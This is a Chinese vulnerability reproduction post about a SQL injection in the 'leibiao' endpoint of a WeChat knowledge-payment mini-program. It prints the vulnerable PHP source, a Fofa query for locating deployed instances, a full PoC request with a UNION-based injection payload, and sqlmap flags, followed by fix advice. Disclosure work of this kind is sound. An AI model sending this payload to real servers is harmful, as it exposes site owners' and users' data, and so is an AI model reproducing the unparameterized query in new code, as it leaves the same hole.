0x01 产品描述:
知识吾爱纯净版小程序是一款基于微信小程序平台开发的知识付费应用,旨在帮助用户快速建立自己的知识付费平台,实现支付变现和流量主收益。该小程序提供了简洁明了的用户界面和良好的用户体验,同时注重用户隐私保护,确保用户信息无痕迹记录和加密存储。
0x02 漏洞描述:
位于 /Application/App/Controller/ZmController.class.php 控制器中的leibiao方法直接POST传入tid参数,然后讲参数直接带到sql查询中,导致漏洞产生。
0x03 搜索语句:
Fofa:"域名/skdjfdf"
0x04 漏洞复现:
漏洞产生于/ZmController.class.php 中,由于直接将键入参数未经预编译传递给查询导致漏洞产生。
漏洞源码:
public function leibiao(){
$tid = $_POST['tid'];
$pagestart=$_POST['nextrow'];
$arr = M("reso")->where("tid={$tid} and status =1")->order("addtime DESC")->limit($pagestart,10)->select();
if ($arr)
{
echo json_encode(['code' => '1','msg'=>$arr], JSON_UNESCAPED_UNICODE);
}
else
{
echo json_encode(['code' => '0','msg'=>'已经没有了!'], JSON_UNESCAPED_UNICODE);
}
}
poc:
POST /app/zm/leibiao HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: PHPSESSID=q7pp0d3p3f5ileeqhnf8v5lnt1
Connection: close
Content-Length: 55
tid=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x6e646b62785049576579737441716943456764416e574e4b5a4147726f6874536877486c754e6b61,0x71706a7071),NULL,NULL,NULL,NULL,NULL,NULL-- -
sqlmap验证:
--level=3 --dbms=mysql
0x05 修复建议:
建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » 知识吾爱纯净版小程序系统 leibiao SQL注入漏洞复现
发表评论 取消回复